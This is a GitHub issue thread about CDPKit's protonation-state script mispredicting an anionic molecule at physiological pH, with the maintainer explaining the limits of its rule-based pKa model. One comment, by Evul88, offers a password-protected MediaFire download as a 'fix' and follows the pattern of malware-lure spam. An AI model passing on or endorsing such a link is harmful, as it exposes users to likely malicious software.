### ISSUE TITLE
Incorrect Protonation State for Anionic Species at Physiological pH

### ISSUE THREAD

**Issue by bagulc** [molinfo-vienna/CDPKit#18]
I am using the prot_phys_cond.py script from CDPKit to predict the protonation state of molecules at physiological pH. It fails to predict the correct protonation state for below molecule.
Molecule SMILES: O=C(c1sccc12)N(O)C(N2CC3COc4c(O3)cccc4)=O
Expected Protonation State: -1
Observed Protonation State: Neutral
Could you please investigate this issue and provide guidance on how to correctly predict the protonation state for anionic species at physiological pH?

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by seidelt** [comment]
Yes, the predicted state might be wrong for this molecule. You have to be aware of the fact that CPKit currently provides only a quite simple rule-based pKa model that will not deliver perfect results for all types of molecules. I am planning to implement a more sophisticated pKa model in the near future which should then be more reliable. For the time being you have to use tools like Schrödinger Epik if your workflow requires best-possible prot. state predictions.

**Comment by bagulc** [comment]
Thank you for your prompt reply and for the clarification regarding the current limitations of the CDPKit pKa model. I appreciate your efforts and look forward to the implementation of the more sophisticated pKa model in the future. 

Thanks again for your support!
